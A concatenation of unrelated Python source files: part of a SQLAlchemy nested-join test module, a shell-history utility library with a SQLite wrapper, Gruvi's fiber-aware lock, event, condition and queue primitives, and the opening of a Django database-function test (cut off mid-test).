        "ON a.id = b.a_id, "
        "a AS a_1 JOIN "
        "(SELECT b.id AS b_id, b.a_id AS b_a_id, "
        "c.id AS c_id, c.b_id AS c_b_id "
        "FROM b JOIN c ON b.id = c.b_id) AS anon_1 "
        "ON a_1.id = anon_1.b_a_id ORDER BY anon_1.b_id"
    )
    _a_bkeyassoc = (
        "SELECT a.id, b_key.id FROM a JOIN (b_key JOIN a_to_b_key "
        "ON b_key.id = a_to_b_key.bid) ON a.id = a_to_b_key.aid"
    )
    _a_bkeyassoc_aliased = (
        "SELECT a.id, b_key_1.id FROM a JOIN (b_key AS b_key_1 "
        "JOIN a_to_b_key AS a_to_b_key_1 ON b_key_1.id = a_to_b_key_1.bid) "
        "ON a.id = a_to_b_key_1.aid"
    )
    # The EXISTS expression in the columns clause still needs a label.
    _a_atobalias_balias_c_w_exists = (
        "SELECT a.id, a_to_b_1.a_id, a_to_b_1.b_id, b_1.id, b_1.a_id, "
        "EXISTS (SELECT * FROM c WHERE c.b_id = b_1.id) AS anon_1 "
        "FROM a LEFT OUTER JOIN "
        "(a_to_b AS a_to_b_1 JOIN b AS b_1 ON b_1.id = a_to_b_1.b_id) "
        "ON a.id = a_to_b_1.a_id"
    )
    _a_atobalias_balias = (
        "SELECT a.id, a_to_b_1.a_id, a_to_b_1.b_id, b_1.id, b_1.a_id "
        "FROM a LEFT OUTER JOIN (a_to_b AS a_to_b_1 "
        "JOIN b AS b_1 ON b_1.id = a_to_b_1.b_id) ON a.id = a_to_b_1.a_id"
    )
    _b_ab1_union_c_ab2 = (
        "SELECT anon_1.b_id, anon_1.b_a_id, anon_1.a_id, anon_1.b1_id, "
        "anon_1.b1_a_id "
        "FROM (SELECT b.id AS b_id, b.a_id AS b_a_id, a.id AS a_id, "
        "b1.id AS b1_id, b1.a_id AS b1_a_id "
        "FROM b JOIN (a JOIN b1 ON a.id = b1.a_id) ON a.id = b.a_id "
        "UNION "
        "SELECT b.id AS b_id, b.a_id AS b_a_id, a.id AS a_id, b2.id AS b2_id, "
        "b2.a_id AS b2_a_id "
        "FROM b JOIN (a JOIN b2 ON a.id = b2.a_id) ON a.id = b.a_id) AS anon_1"
    )
    _b_a_id_double_overlap_annotated = (
        "SELECT anon_1.b_id, anon_1.b_a_id, anon_1.b_a_id_1 FROM "
        "(SELECT b.id AS b_id, b.a_id AS b_a_id, b_a.id AS b_a_id_1 "
        "FROM b JOIN b_a ON b.id = b_a.id) AS anon_1"
    )
    _f_b1a_where_in_b2a = (
        "SELECT f.id, f.a_id "
        "FROM f JOIN (a JOIN b1 ON a.id = b1.a_id) ON a.id = f.a_id "
        "WHERE b1.id IN (SELECT b2.id "
        "FROM a JOIN b2 ON a.id = b2.a_id)"
    )
    _anon_scalar_subqueries = (
        "SELECT (SELECT 1) AS anon_1, (SELECT 2) AS anon_2"
    )
class JoinExecTest(_JoinRewriteTestBase, fixtures.TestBase):
    """invoke the SQL on the current backend to ensure compatibility"""

    __backend__ = True

    # This suite only executes the statements; the rendered SQL is never
    # string-compared, so every expected-SQL attribute from the base class
    # is set to None via one chained assignment.
    _a_bc = (
        _a_bc_wdupes
    ) = (
        _a_bc_wdupes_anon_map
    ) = (
        _a_bc_comma_a1_selbc
    ) = (
        _a__b_dc
    ) = (
        _a_bkeyassoc
    ) = (
        _a_bkeyassoc_aliased
    ) = (
        _a_atobalias_balias_c_w_exists
    ) = (
        _a_atobalias_balias
    ) = (
        _b_ab1_union_c_ab2
    ) = (
        _b_a_id_double_overlap_annotated
    ) = _f_b1a_where_in_b2a = _anon_scalar_subqueries = None

    @classmethod
    def setup_class(cls):
        # 'm' is the module-level MetaData holding the test tables.
        m.create_all(testing.db)

    @classmethod
    def teardown_class(cls):
        m.drop_all(testing.db)

    def _test(self, selectable, assert_):
        # Execute against the live backend; success criterion is that every
        # inner column of the selectable is present in the result's keymap.
        result = testing.db.execute(selectable)
        result.close()
        for col in selectable.inner_columns:
            assert col in result._metadata._keymap

    @testing.skip_if("oracle", "oracle's cranky")
    @testing.skip_if(
        "mssql", "can't query EXISTS in the columns " "clause w/o subquery"
    )
    def test_a_atobalias_balias_c_w_exists(self):
        super(JoinExecTest, self).test_a_atobalias_balias_c_w_exists()

    @testing.only_on(
        "sqlite",
        "non-standard aliasing rules used at the moment, "
        "possibly fix this or add another test that uses "
        "cross-compatible aliasing",
    )
    def test_b_ab1_union_b_ab2(self):
        super(JoinExecTest, self).test_b_ab1_union_b_ab2()
class DialectFlagTest(fixtures.TestBase, AssertsCompiledSQL):
    """Verify that the supports_right_nested_joins dialect flag toggles
    between native nested-join rendering and the subquery rewrite."""

    def test_dialect_flag(self):
        # d1 renders the right-nested join natively; d2 rewrites it into an
        # anonymous SELECT subquery with relabeled columns.
        d1 = default.DefaultDialect(supports_right_nested_joins=True)
        d2 = default.DefaultDialect(supports_right_nested_joins=False)

        j1 = b.join(c)
        j2 = a.join(j1)

        s = select([a, b, c], use_labels=True).select_from(j2)

        self.assert_compile(
            s,
            "SELECT a.id AS a_id, b.id AS b_id, b.a_id AS b_a_id, "
            "c.id AS c_id, "
            "c.b_id AS c_b_id FROM a JOIN (b JOIN c ON b.id = c.b_id) "
            "ON a.id = b.a_id",
            dialect=d1,
        )
        self.assert_compile(
            s,
            "SELECT a.id AS a_id, anon_1.b_id AS b_id, "
            "anon_1.b_a_id AS b_a_id, "
            "anon_1.c_id AS c_id, anon_1.c_b_id AS c_b_id "
            "FROM a JOIN (SELECT b.id AS b_id, b.a_id AS b_a_id, "
            "c.id AS c_id, "
            "c.b_id AS c_b_id FROM b JOIN c ON b.id = c.b_id) AS anon_1 "
            "ON a.id = anon_1.b_a_id",
            dialect=d2,
        )
| |
#!/usr/bin/python
#
# Copyright 2012 Carl Anderson
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""A library for general use by the advanced shell history utilities.
This library provides components used by _ash_log.py and ash_query.py for
logging, flag parsing, configuration and database management.
"""
__author__ = 'Carl Anderson (carl.anderson@gmail.com)'
# NOTE: This variable is set automatically by the Makefile.
__version__ = '0.7.r164'
import argparse
import logging
import os
import sqlite3
import sys
class Flags(argparse.ArgumentParser):
  """A class to manage all the flags for this advanced shell history utility."""

  class Formatter(argparse.HelpFormatter):
    """A simple formatter with a slightly wider set of flag names."""

    def __init__(self, prog):
      # max_help_position=44 leaves room for ash's long option names before
      # the help text column begins.
      argparse.HelpFormatter.__init__(self, prog, max_help_position=44)

  def __init__(self, arguments=None, flags=None):
    """Initialize the Flags.

    Args:
      arguments: iterable of (short_flag, long_flag, metavar, arg_type,
        help_text) tuples describing flags that take a value.
      flags: iterable of (short_flag, long_flag, help_text) tuples describing
        boolean (store_true) flags.

    Parsing happens immediately on sys.argv; parsed values are exposed both
    as the self.flags dict and as attributes on the instance.
    """
    # NOTE(review): a fresh ArgumentParser is used internally instead of
    # initializing this ArgumentParser subclass itself; parsing is delegated
    # to self._parser.
    parser = argparse.ArgumentParser(formatter_class=Flags.Formatter)

    # Add the standard argument-taking flags.
    for short_flag, long_flag, metavar, arg_type, help_text in arguments or []:
      parser.add_argument('-' + short_flag, '--' + long_flag, metavar=metavar,
                          type=arg_type, help=help_text)

    # Add the standard no-argument-taking flags.
    for short_flag, long_flag, help_text in flags or []:
      parser.add_argument('-' + short_flag, '--' + long_flag,
                          action='store_true', help=help_text)

    # Add a flag to display the version and exit.
    parser.add_argument('-V', '--version', action='version', version=__version__,
                        help='prints the version and exits')

    self._parser = parser
    self.flags = parser.parse_args().__dict__
    self.__dict__.update(self.flags)

  def PrintHelp(self):
    """Prints the help menu."""
    self._parser.print_help()
class Config(object):
  """A class to manage the configuration environment variables.

  All environment variables beginning with the prefix 'ASH_CFG_' are loaded
  and made accessible conveniently through an instance of this class.

  For example:
    ASH_CFG_HISTORY_DB='/foo/' becomes { 'HISTORY_DB': '/foo/' }
  """

  def __init__(self):
    """Initialize a Config instance, reading os.environ for variables."""
    prefix = 'ASH_CFG_'
    # Keep everything after the ASH_CFG_ prefix as the variable name.
    self.variables = {
        name[len(prefix):]: value
        for name, value in os.environ.items()
        if name.startswith(prefix)
    }

  def GetBool(self, variable):
    """Returns a bool value for a config variable, or None if not set."""
    value = self.GetString(variable)
    if not value:
      return value
    return value.strip() == 'true'

  def GetString(self, variable):
    """Returns a string value for a config variable, or None if not set."""
    if not self.Sets(variable):
      return None
    return self.variables[variable.upper().strip()]

  def Sets(self, variable):
    """Returns true when the argument variable exists in the environment."""
    if not variable:
      return variable
    return variable.upper().strip() in self.variables
def InitLogging():
  """Initializes the logging module.

  Uses the following shell environment variables to configure the logger:
    ASH_CFG_LOG_DATE_FMT - to format the date strings in the log file.
    ASH_CFG_LOG_LEVEL - to set the logging level (DEBUG, INFO, etc).
    ASH_CFG_LOG_FILE - the filename where the logger will write.
    ASH_SESSION_ID - the session id to include in the logged output.

  Lines are written in roughly this format:
    2012-07-17 23:59:59 PDT: SESSION 123: DEBUG: argv = "[0]='ls'"
  """
  session_id = os.getenv('ASH_SESSION_ID') or 'NEW'
  config = Config()

  # Resolve the configured level name to a logging constant; anything that
  # is not a (truthy) attribute of the logging module falls back to DEBUG.
  level_name = config.GetString('LOG_LEVEL') or 'INFO'
  level = getattr(logging, level_name, 0) or logging.DEBUG

  # NOTE(review): there is no separator between %(asctime)s and 'SESSION';
  # presumably ASH_CFG_LOG_DATE_FMT supplies trailing punctuation - confirm.
  log_format = '%(asctime)sSESSION ' + session_id + ': %(levelname)s: %(message)s'

  logging.basicConfig(
      datefmt=config.GetString('LOG_DATE_FMT'),
      filename=config.GetString('LOG_FILE'),
      format=log_format,
      level=level,
  )
class Database(object):
  """A wrapper around a connection to the sqlite3 history database."""

  # The name of the sqlite3 file backing the saved command history.
  # Resolved lazily from the ASH_CFG_HISTORY_DB config variable on first use.
  filename = None

  class Object(object):
    """A construct for objects to be inserted into the Database."""

    def __init__(self, table_name):
      """Ensure the backing table exists, creating it when missing.

      Args:
        table_name: name of the table this object will be inserted into.

      Subclasses are expected to provide GetCreateTableSql().
      """
      self.values = {}
      self.table_name = table_name
      sql = '''
        select sql
          from sqlite_master
         where
           type = 'table'
           and name = ?;
      '''
      # Check that the table exists, creating it if not.
      db = Database()
      cur = db.cursor
      try:
        cur.execute(sql, (table_name,))
        rs = cur.fetchone()
        if not rs:
          cur.execute(self.GetCreateTableSql() + ';')
          db.connection.commit()
        elif rs[0] != self.GetCreateTableSql().strip():
          # The table cannot safely be recreated; warn and carry on.
          logging.warning('Table %s exists, but has an unexpected schema.',
                          table_name)
      finally:
        cur.close()

    def Insert(self):
      """Insert the object into the database, returning the new rowid."""
      sql = 'INSERT INTO %s ( %s ) VALUES ( %s )' % (
          self.table_name,
          ', '.join(self.values),
          ', '.join(['?' for _ in self.values])
      )
      return Database().Execute(sql, tuple(self.values.values()))

  def __init__(self):
    """Initialize a Database with an open connection to the history database."""
    if Database.filename is None:
      Database.filename = Config().GetString('HISTORY_DB')
    self.connection = sqlite3.connect(Database.filename)
    # Row objects support both index access and keys() (used by Fetch).
    self.connection.row_factory = sqlite3.Row
    self.cursor = self.connection.cursor()

  def Execute(self, sql, values):
    """Execute a write query, returning the new rowid (0 on constraint error).

    The connection is committed and the cursor closed in all cases, so each
    Execute call needs a fresh Database instance.
    """
    try:
      self.cursor.execute(sql, values)
      logging.debug('executing query: %s, values = %r', sql, values)
      return self.cursor.lastrowid
    except sqlite3.IntegrityError as e:
      # Constraint violations (e.g. duplicates) are expected; log only.
      logging.debug('constraint violation: %r', e)
    finally:
      self.connection.commit()
      self.cursor.close()
    return 0

  @classmethod
  def SanityCheck(cls, sql):
    """Returns true when sql is one complete (';'-terminated) statement."""
    return sql and sqlite3.complete_statement(sql)

  def Fetch(self, sql, params=(), limit=None):
    """Execute a select query and return the result set.

    Args:
      sql: a complete (';'-terminated) select statement.
      params: optional bound parameters for the query.
      limit: optional maximum number of data rows returned; None or a
        non-positive value returns all rows.

    Returns:
      A list whose first element is a tuple of column headings, followed by
      the data rows, or None when the query is invalid, empty, or fails.
    """
    if not self.SanityCheck(sql):
      return None
    try:
      self.cursor.execute(sql, params)
      first_row = self.cursor.fetchone()
      if not first_row:
        return None
      headings = tuple(first_row.keys())
      if limit is None or limit <= 0:
        rows = self.cursor.fetchall()
      else:
        rows = []
        fetched = 1
        while fetched < limit:
          row = self.cursor.fetchone()
          if not row:
            break
          rows.append(row)
          fetched += 1
      # BUG FIX: previously the last fetched row (or None) was re-inserted
      # here, silently dropping the first data row whenever a limit was
      # given; re-insert the *first* row after the headings instead.
      rows.insert(0, headings)
      rows.insert(1, first_row)
      return rows
    except sqlite3.Error:
      # BUG FIX: this used the Python 2 print statement ('print >> ...') and
      # the 'sys' module was never imported; write to stderr portably.
      sys.stderr.write('Failed to execute query: %s (%s)\n' % (sql, params))
      return None
    finally:
      self.cursor.close()
      self.cursor = None
| |
#
# This file is part of Gruvi. Gruvi is free software available under the
# terms of the MIT license. See the file "LICENSE" that was provided
# together with this source file for the licensing terms.
#
# Copyright (c) 2012-2014 the Gruvi authors. See the file "AUTHORS" for a
# complete list.
from __future__ import absolute_import, print_function
import fibers
import threading
import heapq
from .hub import switchpoint, get_hub, switch_back, assert_no_switchpoints
from .callbacks import add_callback, remove_callback, pop_callback
from .callbacks import run_callbacks, walk_callbacks
__all__ = ['Lock', 'RLock', 'Event', 'Condition', 'QueueEmpty', 'QueueFull',
'Queue', 'LifoQueue', 'PriorityQueue']
# All primitives in this module are thread safe!
class _Lock(object):
    """Base class for regular and reentrant locks."""

    __slots__ = ('_reentrant', '_lock', '_locked', '_owner', '_callbacks')

    def __init__(self, reentrant):
        # Allocate a new lock
        self._reentrant = reentrant
        self._lock = threading.Lock()   # thread lock protecting the state below
        self._locked = 0                # recursion count; 0 means unlocked
        self._owner = None              # fiber currently holding the lock
        self._callbacks = None          # waiters (managed via callbacks module)

    def locked(self):
        """Whether the lock is currently locked."""
        # Note: returns the integer recursion count, which is truthy when held.
        return self._locked

    @switchpoint
    def acquire(self, blocking=True, timeout=None):
        """Acquire the lock.

        If *blocking* is true (the default), then this will block until the
        lock can be acquired. The *timeout* parameter specifies an optional
        timeout in seconds.

        The return value is a boolean indicating whether the lock was acquired.
        """
        hub = get_hub()
        try:
            # switcher.__call__ needs to be synchronized with a lock IF it can
            # be called from different threads. This is the case here because
            # this method may be called from multiple threads and the callbacks
            # are run in the calling thread. So pass it our _lock.
            with switch_back(timeout, lock=self._lock) as switcher:
                with self._lock:
                    if not self._locked:
                        # Uncontended: take ownership immediately.
                        self._locked = 1
                        self._owner = fibers.current()
                        return True
                    elif self._reentrant and self._owner is fibers.current():
                        # Reentrant re-acquisition: bump the recursion count.
                        self._locked += 1
                        return True
                    elif not blocking:
                        return False
                    # Register ourselves as a waiter; _release() will hand
                    # the lock over via the switcher.
                    handle = add_callback(self, switcher)
                # It is safe to call hub.switch() outside the lock. Another
                # thread could have called acquire()+release(), thereby firing
                # the switchback. However the switchback only schedules the
                # switchback in our hub, it won't execute it yet. So the
                # switchback won't actually happen until we switch to the hub.
                hub.switch()
            # Here the lock should be ours because _release() wakes up only
            # the fiber that it passed the lock.
            assert self._locked > 0
            assert self._owner is fibers.current()
        except BaseException as e:
            # Likely a Timeout but could also be e.g. Cancelled
            with self._lock:
                # Clean up the callback. It might have been popped by
                # _release() but that is OK.
                remove_callback(self, handle)
                # This fiber was passed the lock but before that an exception
                # was already scheduled with run_callback() (likely through
                # Fiber.throw())
                if self._owner is fibers.current():
                    self._release()
            if e is switcher.timeout:
                return False
            raise
        return True

    def _release(self):
        # Low-level release. Lock must be held.
        if self._locked > 1:
            # Reentrant lock held multiple times: just drop one level.
            self._locked -= 1
            return
        # Hand the lock directly to the first still-active waiter, if any.
        while self._callbacks:
            switcher, _ = pop_callback(self)
            if switcher.active:
                self._owner = switcher.fiber
                switcher.switch()
                return
        # No waiters: fully unlock.
        self._owner = None
        self._locked = 0

    def release(self):
        """Release the lock."""
        with self._lock:
            if not self._locked:
                raise RuntimeError('lock not currently held')
            elif self._reentrant and self._owner is not fibers.current():
                raise RuntimeError('lock not owned by this fiber')
            self._release()

    __enter__ = acquire
    __exit__ = lambda self, *exc_info: self.release()

    # Internal API used by Condition instances.

    def _acquire_restore(self, state):
        # Acquire a lock and restore the owner and lock count.
        self.acquire()
        self._owner, self._locked = state

    def _release_save(self):
        # Release a lock even if it is locked multiple times. Return the state.
        state = self._owner, self._locked
        self.release()
        return state
class Lock(_Lock):
    """A non-reentrant lock.

    The lock can be locked and unlocked explicitly using :meth:`acquire` and
    :meth:`release`, and it can also be used as a context manager.
    """

    __slots__ = _Lock.__slots__

    def __init__(self):
        # A plain Lock is a _Lock with reentrancy disabled.
        super(Lock, self).__init__(reentrant=False)
class RLock(_Lock):
    """A reentrant lock.

    A reentrant lock has the notion of a "lock owner" and a "lock count". If a
    reentrant lock is acquired, and it was already acquired by the current
    fiber, then the lock count is increased and the acquire call will be
    successful. Unlocking a reentrant lock may only be done by the lock owner.
    The lock becomes unlocked only after it is released as many times as it was
    acquired.
    """

    __slots__ = _Lock.__slots__

    def __init__(self):
        # An RLock is a _Lock with reentrancy enabled.
        super(RLock, self).__init__(reentrant=True)
# A few words on the use of fiber locks (Lock) vs thread locks (threading.Lock)
# in the code below.
#
# There is no difference between both locks from a safety point of view. Both
# locks are thread-safe (which implies they are fiber-safe as well). The
# difference is who gets blocked when trying to acquire a lock that is already
# locked. With a fiber lock only the current fiber is blocked and other fibers
# in current thread can continue (and fibers in other threads as well, of
# course). With a thread lock the entire current thread is blocked including
# all its fibers.
#
# This means that if we never call hub.switch() when a lock is held, fiber and
# thread locks are completely identical. In this case there's a benefit in
# using thread locks because i) they are smaller and faster, and ii) it makes
# it possible for non-switchpoints to acquire the lock. An example of the
# latter case is Queue.put_nowait().
class Event(object):
    """An event.

    An event contains an internal flag that is initially False. The flag can be
    set using the :meth:`set` method and cleared using the :meth:`clear`
    method. Fibers can wait for the flag to become set using :meth:`wait`.

    Events are level triggered, meaning that the condition set by :meth:`set`
    is "sticky". Setting the event will unblock all current waiters and will
    cause future calls to :meth:`wait` not to block, until :meth:`clear` is
    called again.
    """

    __slots__ = ('_flag', '_lock', '_callbacks')

    def __init__(self):
        self._flag = False
        self._lock = threading.Lock()   # protects _flag and _callbacks
        self._callbacks = None          # waiters (managed via callbacks module)

    def is_set(self):
        """Return whether the internal flag is set."""
        return self._flag

    def set(self):
        """Set the internal flag, and wake up any fibers blocked on :meth:`wait`."""
        with self._lock:
            if self._flag:
                return
            self._flag = True
            # Waking the waiters must not switch out of this fiber; the
            # callbacks only schedule switch-backs in the waiters' hubs.
            with assert_no_switchpoints():
                run_callbacks(self)

    def clear(self):
        """Clear the internal flag."""
        with self._lock:
            self._flag = False

    @switchpoint
    def wait(self, timeout=None):
        """If the internal flag is set, return immediately. Otherwise block
        until the flag gets set by another fiber calling :meth:`set`.

        Returns True when the flag is set, False when *timeout* expired.
        """
        # Optimization for the case the Event is already set.
        if self._flag:
            return True
        hub = get_hub()
        try:
            with switch_back(timeout, lock=self._lock) as switcher:
                with self._lock:
                    # Need to check the flag again, now under the lock.
                    if self._flag:
                        return True
                    # Allow other fibers to wake us up via callback in set().
                    # The callback goes to switcher.switch() directly instead
                    # of __call__(), because the latter would try to lock our
                    # lock which is already held when callbacks are run by
                    # set().
                    handle = add_callback(self, switcher.switch)
                # See note in Lock.acquire() why we can call to hub.switch()
                # outside the lock.
                hub.switch()
        except BaseException as e:
            with self._lock:
                remove_callback(self, handle)
            if e is switcher.timeout:
                return False
            raise
        return True

    # Support for wait()

    def add_done_callback(self, callback, *args):
        # Run *callback* immediately if the flag is already set, otherwise
        # register it to be run by set(); returns a handle (or None when
        # run immediately).
        with self._lock:
            if self._flag:
                callback(*args)
                return
            return add_callback(self, callback, args)

    def remove_done_callback(self, handle):
        # Unregister a callback previously added via add_done_callback().
        with self._lock:
            remove_callback(self, handle)
# Utility functions for a condition to work with both Locks and RLocks.
def is_locked(lock):
    """Return whether a lock is locked.

    Supports :class:`Lock`, :class:`RLock`, :class:`threading.Lock` and
    :class:`threading.RLock` instances.
    """
    # Fiber locks and threading.Lock expose locked(); threading.RLock
    # exposes the private _is_owned() instead.
    probe = getattr(lock, 'locked', None)
    if probe is not None:
        return probe()
    probe = getattr(lock, '_is_owned', None)
    if probe is not None:
        return probe()
    raise TypeError('expecting Lock/RLock')
def acquire_restore(lock, state):
    """Acquire a lock and restore its state."""
    # _Lock and threading.RLock support restoring owner/recursion state;
    # plain locks are simply acquired and *state* is ignored.
    restore = getattr(lock, '_acquire_restore', None)
    if restore is not None:
        restore(state)
        return
    if hasattr(lock, 'acquire'):
        lock.acquire()
        return
    raise TypeError('expecting Lock/RLock')
def release_save(lock):
    """Release a lock and return its state."""
    # _Lock and threading.RLock can fully release a multiply-held lock and
    # report the saved state; plain locks just release (state is None).
    save = getattr(lock, '_release_save', None)
    if save is not None:
        return save()
    if hasattr(lock, 'release'):
        lock.release()
        return None
    raise TypeError('expecting Lock/RLock')
def thread_lock(lock):
    """Return the thread lock for *lock*."""
    # Fiber locks carry their protecting threading.Lock in ._lock; a bare
    # thread lock (anything with acquire()) is its own thread lock.
    try:
        return lock._lock
    except AttributeError:
        pass
    if hasattr(lock, 'acquire'):
        return lock
    raise TypeError('expecting Lock/RLock')
class Condition(object):
    """A condition.

    A condition is always associated with a lock. The state of the condition
    may only change when the caller has acquired the lock. While the lock is
    held, a condition can be waited for using :meth:`wait`. The wait method
    will release the lock just before blocking itself, so that another fiber
    can call :meth:`notify` to notify the condition.

    The difference between a condition and an :class:`Event` is that a
    condition is edge-triggered. This means that when a condition is notified,
    only fibers that are waiting *at the time of notification* are unblocked.
    Any fiber that calls :meth:`wait` after the notification, will block until
    the next notification. This also explains why a lock is needed. Without the
    lock there would be a race condition between notification and waiting.
    """

    __slots__ = ('_lock', '_callbacks')

    def __init__(self, lock=None):
        """
        The *lock* argument can be used to share a lock between multiple
        conditions. It must be a :class:`Lock` or :class:`RLock` instance. If
        no lock is provided, a :class:`RLock` is allocated.
        """
        self._lock = lock or RLock()
        self._callbacks = None   # waiters (managed via the callbacks module)

    # Lock operations are delegated to the associated lock.
    acquire = lambda self, *args: self._lock.acquire(*args)
    release = lambda self: self._lock.release()
    __enter__ = lambda self: self._lock.acquire()
    __exit__ = lambda self, *exc_info: self.release()

    def notify(self, n=1):
        """Raise the condition and wake up fibers waiting on it.

        The optional *n* parameter specifies how many fibers will be notified.
        By default, one fiber is notified.
        """
        if not is_locked(self._lock):
            raise RuntimeError('lock is not locked')
        notified = [0]  # Work around lack of "nonlocal" in py27
        def walker(switcher, predicate):
            # Return value indicates whether to KEEP the callback registered.
            if not switcher.active:
                return False  # do not keep a switcher that timed out
            if predicate and not predicate():
                return True
            if n >= 0 and notified[0] >= n:
                # Already woke up the requested number of fibers (n < 0
                # means notify_all).
                return True
            switcher.switch()
            notified[0] += 1
            return False  # only notify once
        walk_callbacks(self, walker)

    def notify_all(self):
        """Raise the condition and wake up all fibers waiting on it."""
        self.notify(-1)

    @switchpoint
    def wait(self, timeout=None):
        """Wait for the condition to be notified.

        The return value is True, unless a timeout occurred in which case the
        return value is False.

        The lock must be held before calling this method. This method will
        release the lock just before blocking itself, and it will re-acquire it
        before returning.
        """
        return self.wait_for(None, timeout)

    @switchpoint
    def wait_for(self, predicate, timeout=None):
        """Like :meth:`wait` but additionally for *predicate* to be true.

        The *predicate* argument must be a callable that takes no arguments.
        Its result is interpreted as a boolean value.
        """
        if not is_locked(self._lock):
            raise RuntimeError('lock is not locked')
        hub = get_hub()
        try:
            with switch_back(timeout, lock=thread_lock(self._lock)) as switcher:
                handle = add_callback(self, switcher, predicate)
                # See the comment in Lock.acquire() why it is OK to release the
                # lock here before calling hub.switch().
                # Also if this is a reentrant lock make sure it is fully
                # released.
                state = release_save(self._lock)
                hub.switch()
        except BaseException as e:
            # NOTE(review): if switch_back()/add_callback() raised before
            # 'handle' and 'state' were bound, this cleanup (and the finally
            # below) would raise NameError - presumably they never fail;
            # confirm upstream.
            with self._lock:
                remove_callback(self, handle)
            if e is switcher.timeout:
                return False
            raise
        finally:
            acquire_restore(self._lock, state)
        return True
class QueueEmpty(Exception):
    """Queue is empty (raised by non-blocking or timed-out gets)."""
class QueueFull(Exception):
    """Queue is full (raised by non-blocking or timed-out puts)."""
class Queue(object):
    """A synchronized FIFO queue. """

    __slots__ = ('_maxsize', '_unfinished_tasks', '_heap', '_size', '_counter',
                 '_lock', '_notempty', '_notfull', '_alldone')

    def __init__(self, maxsize=0):
        """
        The *maxsize* argument specifies the maximum queue size. If it is less
        than or equal to zero, the queue size is infinite.
        """
        self._maxsize = maxsize
        self._unfinished_tasks = 0
        # Use a list/heapq even for a FIFO instead of a deque() because of the
        # latter's high memory use (see comment in Lock). For most protocols
        # there will be one Queue per connection so a low memory footprint is
        # very important.
        self._heap = []
        self._size = 0
        self._counter = 0   # monotonically increasing; orders FIFO entries
        # Use a threading.Lock so that put_nowait() and get_nowait() don't need
        # to be a switchpoint. Also it is more efficient.
        self._lock = threading.Lock()
        # All three conditions share the same thread lock.
        self._notempty = Condition(self._lock)
        self._notfull = Condition(self._lock)
        self._alldone = Condition(self._lock)

    def _get_item_priority(self, item):
        # Priority function: FIFO queue by default
        self._counter += 1
        return self._counter

    def qsize(self):
        """Return the size of the queue, which is the sum of the size of all
        its elements."""
        return self._size

    empty = lambda self: self.qsize() == 0
    # Chained comparison: only a positive maxsize can make the queue full.
    full = lambda self: self.qsize() >= self.maxsize > 0
    maxsize = property(lambda self: self._maxsize)
    unfinished_tasks = property(lambda self: self._unfinished_tasks)

    @switchpoint
    def put(self, item, block=True, timeout=None, size=None):
        """Put *item* into the queue.

        If the queue is currently full and *block* is True (the default), then
        wait up to *timeout* seconds for space to become available. If no
        timeout is specified, then wait indefinitely.

        If the queue is full and *block* is False or a timeout occurs, then
        raise a :class:`QueueFull` exception.

        The optional *size* argument may be used to specify a custom size for
        the item. The total :meth:`qsize` of the queue is the sum of the sizes
        of all the items. The default size for an item is 1.
        """
        if size is None:
            size = 1
        with self._lock:
            priority = self._get_item_priority(item)
            # The chained comparison makes this loop a no-op for an
            # infinite queue (maxsize <= 0).
            while self._size + size > self.maxsize > 0:
                if not block:
                    raise QueueFull
                if not self._notfull.wait_for(lambda: self._size+size <= self.maxsize, timeout):
                    raise QueueFull
            heapq.heappush(self._heap, (priority, size, item))
            self._size += size
            self._unfinished_tasks += 1
            self._notempty.notify()

    def put_nowait(self, item, size=None):
        """Equivalent of ``put(item, False)``."""
        # Don't turn this method into a switchpoint as put() will never
        # switch if block is False. This can be done by calling the function
        # wrapped by the @switchpoint wrapper directly.
        return self.put.__wrapped__(self, item, False, size=size)

    @switchpoint
    def get(self, block=True, timeout=None):
        """Pop an item from the queue.

        If the queue is not empty, an item is returned immediately. Otherwise,
        if *block* is True (the default), wait up to *timeout* seconds for an
        item to become available. If no timeout is provided, then wait
        indefinitely.

        If the queue is empty and *block* is false or a timeout occurs, then
        raise a :class:`QueueEmpty` exception.
        """
        with self._lock:
            while not self._heap:
                if not block:
                    raise QueueEmpty
                if not self._notempty.wait(timeout):
                    raise QueueEmpty
            prio, size, item = heapq.heappop(self._heap)
            self._size -= size
            # Only wake a waiting producer when a bounded queue now has room.
            if 0 <= self._size < self.maxsize:
                self._notfull.notify()
            return item

    def get_nowait(self):
        """Equivalent of ``get(False)``."""
        # See note in put_nowait()
        return self.get.__wrapped__(self, False)

    def task_done(self):
        """Mark a task as done."""
        with self._lock:
            unfinished = self._unfinished_tasks - 1
            if unfinished < 0:
                raise RuntimeError('task_done() called too many times')
            elif unfinished == 0:
                self._alldone.notify()
            self._unfinished_tasks = unfinished

    def join(self):
        """Wait until all tasks are done."""
        with self._lock:
            while self._unfinished_tasks > 0:
                self._alldone.wait()
class LifoQueue(Queue):
    """A queue that yields its items in LIFO (stack) order.

    See :class:`Queue` for a description of the API.
    """

    __slots__ = Queue.__slots__

    def _get_item_priority(self, item):
        # Each new item receives a strictly smaller (= higher) priority than
        # every item before it, so the most recent item is popped first.
        self._counter += 1
        return -self._counter
class PriorityQueue(Queue):
    """A priority queue.

    Items that are added via :meth:`~Queue.put` are typically ``(priority,
    item)`` tuples. Lower values for priority indicate a higher priority.

    See :class:`Queue` for a description of the API.
    """

    __slots__ = Queue.__slots__

    def _get_item_priority(self, item):
        # The item carries its own ordering (typically a (priority, value)
        # tuple), so it is used as the heap key unchanged.
        return item
| |
from __future__ import unicode_literals
from django.db.models import TextField, CharField, Value as V
from django.db.models.functions import (
Coalesce, Concat, Lower, Upper, Length, Substr,
)
from django.test import TestCase
from django.utils import six, timezone
from .models import Author, Article
# Shared fixture text used as Article body content in the tests below.
# Note: the leading newline is part of the value.
lorem_ipsum = """
Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod
tempor incididunt ut labore et dolore magna aliqua."""
class FunctionTests(TestCase):
    """Tests for the SQL function expressions from
    ``django.db.models.functions``: Coalesce, Concat, Lower, Upper, Length
    and Substr.
    """

    def test_coalesce(self):
        # Rhonda has no alias, so Coalesce falls back to her name.
        Author.objects.create(name='John Smith', alias='smithj')
        Author.objects.create(name='Rhonda')
        authors = Author.objects.annotate(display_name=Coalesce('alias', 'name'))
        self.assertQuerysetEqual(
            authors.order_by('name'), [
                'smithj',
                'Rhonda',
            ],
